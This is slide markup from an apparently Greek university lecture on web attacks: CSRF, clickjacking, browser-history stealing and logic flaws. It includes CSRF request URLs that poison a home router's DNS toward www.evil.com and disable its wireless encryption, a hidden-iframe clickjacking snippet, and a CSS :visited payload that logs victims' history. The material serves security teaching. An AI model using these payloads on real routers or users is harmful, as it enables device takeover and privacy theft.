          </a:p>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>http://betterexplained.com/articles/gmail-contacts-flaw-overview-and-suggestions/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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Netflix: Αλλαγή διεύθυνσης κατοικίας και παραγγελία ταινιών</a:t>
            </a:r>
          </a:p>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>http://jeremiahgrossman.blogspot.com/2006/10/more-on-netflixs-csrf-advisory.html</a:t>
            </a:r>
          </a:p>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Skype: Πλαστοπροσωπία χρήστη, χρήση μονάδων κλήσεων</a:t>
            </a:r>
          </a:p>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rPr b="0" i="0" lang="el" sz="1100" u="none" cap="none" strike="noStrik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pic>
        <p:nvPicPr>
          <p:cNvPr id="473" name="Shape 473"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="525450" y="2379911"/>
            <a:ext cx="1148850" cy="510600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="474" name="Shape 474"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="522275" y="3283873"/>
            <a:ext cx="1155203" cy="510600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="475" name="Shape 475"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="525447" y="1478400"/>
            <a:ext cx="1148849" cy="50816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Επίθεση σε home router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Shape 48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DNS poisoning (216.94.23.0 www.evil.com)</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http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>=J38_SET&amp; NAME=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.evil.com&amp;ADDR=216.94.23.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>0</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Απενεργοποίηση του wireless authentication</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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>http://192.168.1.254/xslt?PAGE=C05_POST&amp;THISPAGE=C05&amp;NEXTPAGE=C05_POST&amp;NAME=encrypt_enabled&amp;VALUE=0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Απενεργοποίηση του firewall, αλλαγή κωδικού πρόσβασης, κτλ...</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4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Clickjacking</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Clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Shape 49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45720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Ο εισβολέας κατασκευάζει μια κακόβουλη ιστοσελίδα που περιλαμβάνει</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el" sz="1600"/>
              <a:t> κρυμένη απο πίσω </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>μια ασφαλή ιστοσελίδα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Οι χρήστες θεωρώντας ότι έχουν επισκεφθεί την ασφαλή ιστοσελίδα εκτελούν ακούσια κλικ προς όφελος του εισβολέα.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Μπορεί να έχει σαν συνέπεια την διάδοση web worms, την υποκλοπή εμπιστευτικών πληροφοριών (passwords, cookies), την αποστολή spam emails, κτλ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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Καινούργια μορφή επίθεσης (προτάθηκε τον Σεπτέμβριο του 2008) που έχει ήδη στοχεύσει το Twitter και το Facebook.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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368100" y="1818150"/>
            <a:ext cx="8320800" cy="15071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1" i="0" sz="3000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="el" sz="3000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Η ανεπαρκής επικύρωση των δεδομένων εισόδου αποτελεί το τρωτό σημείο των web εφαρμογών.</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Clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Shape 49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ourier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/* iframe from tumblr.com */</a:t>
            </a:r>
          </a:p>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>iframe {</a:t>
            </a:r>
          </a:p>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  width:300px;</a:t>
            </a:r>
          </a:p>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  height:500px;</a:t>
            </a:r>
          </a:p>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  position:absolute;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  top:50; left:0;</a:t>
            </a:r>
          </a:p>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  /* in real attack opacity=0 */</a:t>
            </a:r>
          </a:p>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  filter:alpha(opacity=50); </a:t>
            </a:r>
          </a:p>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  opacity:0.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk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chemeClr val="dk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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;h1&gt;Breaking Bad addict?&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;iframe src="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1400" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://bieber-fashion.tumblr.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;a href="#" style="position:relative;left:60px;top:10px;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>z-index:-1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Watch in HD for free&lt;/a&gt;</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Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="499" name="Shape 499"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5856950" y="753312"/>
            <a:ext cx="2895600" cy="31146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lang="el"/>
              <a:t>ΟWASP Example about </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="el" sz="3600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="Shape 505"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687600" y="2382450"/>
            <a:ext cx="7768800" cy="1491300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="el" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>…imagine an attacker who builds a web site that has a button on it that says “click here for a free iPod”. However, on top of that web page, the attacker has loaded an iframe with your mail account, and lined up exactly the “delete all messages” button directly on top of the “free iPod” button. The victim tries to click on the “free iPod” button but instead actually clicked on the invisible “delete all messages” button. In essence, the attacker has “hijacked” the user’s click, hence the name “Clickjacking”.</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4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Browser History Stealing</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x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Shape 51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Οι browsers εμφανίζουν διαφορετικά τους συνδέσμους που</a:t>
            </a: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έχετε επισκεφθεί από αυτός που δεν έχετε επισκεφθεί.</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Μήπως το “θύμα” έχει επισκεφθεί το www.thepiratebay.se?</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O εισβολέας δημιουργεί μια ιστοσελίδα που περιλαμβάνει ένα σύνδεσμο στο Pirate Bay.</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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;a href=”thepiratebay.se/”&gt;The Pirate Bay&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>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Το θύμα επισκέπτεται την ιστοσελίδα και ο εισβολέας ελέγχει το χρώμα του συνδέσμου.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Shape 51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Browser history stealing </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="517" name="Shape 517"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6816075" y="1407100"/>
            <a:ext cx="1870724" cy="1341274"/>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Ο εισβολέας ελέγχει το χρώμα του συνδέσμου με javascript.</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Η επίθεση μπορεί να γίνει και με CSS (Cascading Style Sheets).</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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>a:visited {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  background: url(log_visited.php?thepiratebay.se)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="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rgbClr val="FF0000"/>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Παραδείγματα:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://ha.ckers.org/weird/CSS-history.cgi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="sng" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://lcamtuf.coredump.cx/cachetime/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Shape 52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Browser history stealing</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4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Logic flaws</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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>O εισβολέας μπορεί να εκμεταλλευτεί σφάλματα στο business logic μιας εφαρμογής και να παραβιάσει το ομαλό workflow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="292100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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>H επίθεση μπορεί να έχει πολλές μορφές και στοχεύει στην λειτουργικότητα και την πολιτική ασφάλειας της εκάστοτε εφαρμογής.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="292100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600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Ένα σφάλμα στο business logic μιας εφαρμογής μπορεί να εξελιχθεί σε σημαντικότερο κενό ασφάλειας.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="2921000" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="250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1" i="0" lang="el" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Παράδειγμα: </a:t>
            </a:r>
            <a:r>
